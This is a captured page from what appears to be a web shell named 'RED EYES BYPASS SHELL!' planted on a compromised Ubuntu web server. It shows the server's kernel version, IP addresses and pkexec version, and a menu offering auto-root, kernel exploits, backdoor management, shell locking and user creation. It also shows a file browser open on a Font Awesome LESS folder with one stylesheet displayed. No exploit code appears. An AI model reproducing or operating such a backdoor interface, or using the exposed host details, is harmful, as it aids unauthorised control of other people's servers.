Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
work_181165 /
plugin /
icon /
less /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
_animated.less
6.48
KB
-rwxr-xr-x
_bordered-pulled.less
724
B
-rwxr-xr-x
_core.less
792
B
-rwxr-xr-x
_fixed-width.less
121
B
-rwxr-xr-x
_icons.less
287
B
-rwxr-xr-x
_list.less
448
B
-rwxr-xr-x
_mixins.less
1.83
KB
-rwxr-xr-x
_rotated-flipped.less
604
B
-rwxr-xr-x
_screen-reader.less
322
B
-rwxr-xr-x
_shims.less
60.27
KB
-rwxr-xr-x
_sizing.less
364
B
-rwxr-xr-x
_stacked.less
634
B
-rwxr-xr-x
_variables.less
157.31
KB
-rwxr-xr-x
brands.less
813
B
-rwxr-xr-x
fontawesome.less
615
B
-rwxr-xr-x
regular.less
724
B
-rwxr-xr-x
solid.less
717
B
-rwxr-xr-x
v4-shims.less
337
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _mixins.less
// mixins // -------------------------- // base rendering for an icon .fa-icon() { -moz-osx-font-smoothing: grayscale; -webkit-font-smoothing: antialiased; display: inline-block; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1; } // sets relative font-sizing and alignment (in _sizing) .fa-size(@font-size) { font-size: (@font-size / @fa-size-scale-base) * 1em; // converts step in sizing scale into an em-based value that's relative to the scale's base line-height: (1 / @font-size) * 1em; // sets the line-height of the icon back to that of it's parent vertical-align: ((6 / @font-size) - (3 / 8)) * 1em; // vertically centers the icon taking into account the surrounding text's descender } // only display content to screen readers // see: https://www.a11yproject.com/posts/2013-01-11-how-to-hide-content/ // see: https://hugogiraudel.com/2016/10/13/css-hide-and-seek/ .fa-sr-only() { position: absolute; width: 1px; height: 1px; padding: 0; margin: -1px; overflow: hidden; clip: rect(0, 0, 0, 0); white-space: nowrap; border-width: 0; } // use in conjunction with .sr-only to only display content when it's focused .fa-sr-only-focusable() { &:not(:focus) { .fa-sr-only(); } } // sets a specific icon family to use alongside style + icon mixins .fa-family-classic() { font-family: 'Font Awesome 6 Free'; } // convenience mixins for declaring pseudo-elements by CSS variable, // including all style-specific font properties, and both the ::before // and ::after elements in the duotone case. .fa-icon-solid(@fa-var) { .fa-icon; .fa-solid; &::before { content: @fa-var; } } .fa-icon-regular(@fa-var) { .fa-icon; .fa-regular; &::before { content: @fa-var; } } .fa-icon-brands(@fa-var) { .fa-icon; .fa-brands; &::before { content: @fa-var; } }
Close